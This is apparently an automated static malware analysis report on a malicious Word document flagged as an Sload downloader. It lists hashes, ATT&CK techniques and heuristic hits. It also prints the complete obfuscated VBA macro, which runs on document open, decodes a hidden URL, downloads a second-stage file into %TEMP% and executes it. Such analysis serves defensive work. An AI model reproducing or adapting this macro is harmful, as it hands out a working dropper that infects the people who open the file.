Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f560478fa8f891c7…

MALICIOUS

Office (OOXML)

15.2 KB Created: 2016-03-17 12:04:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2016-03-27
MD5: 5289a0b90768733c51c7952e8ed5bf0d SHA-1: cfea7f2e893f2383a179e1702eb6248fa2e4c448 SHA-256: f560478fa8f891c749202cabf5477da4aa5382bd2f5c5f8fad67528a25f6bc26
370 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro utilizes WScript.Shell and URLDownloadToFileA to download and execute a second-stage payload from a remote location. The presence of the Document_Open macro and the use of Shell() indicate an automated execution attempt upon opening the document.

Heuristics 9

  • ClamAV: Doc.Downloader.Sload-6961205-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6961205-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If Win64 Then
Private Declare PtrSafe Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#Else
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
Private Sub Document_Open()
DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV = 1
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3685 bytes
SHA-256: 7ebadae724081bddb07170b6b355a67fef0c66cae40db70ff1f0b5d948cd80d6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#Else
Private Declare Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#End If
Dim KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX, DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV, TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF, ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP
Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT 0&, KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX, IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV, 0&, 0&
XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.Run IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV
End Sub
Private Sub Document_Open()
DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV = 1

ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP = 13
KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX = XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK("u��}G<<€}p} |�|�†}r;p|z<s <ur{{r„;r…r")

TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF = XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK("iVO\gf[RZSUbV[Xa_Q\;r…r")
XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY
End Sub
Private Function XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH)
For WHUXEJTBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJU = DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV To Len(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH)
XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG = Mid(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH, WHUXEJTBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJU, DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV)
XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG = Chr(Asc(XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG) - ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP)
ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG = ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG + XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG
Next
XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK = ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12288 bytes
SHA-256: 9367fc0064ce4920a21c37ad34cd212e3a0ba815d02d622bd4be74f70b0c0fe0
Detection
ClamAV: Doc.Downloader.Sload-6961205-0
Obfuscation or payload: likely
68 of 133 identifiers look randomly generated (e.g. 'XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMROD') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.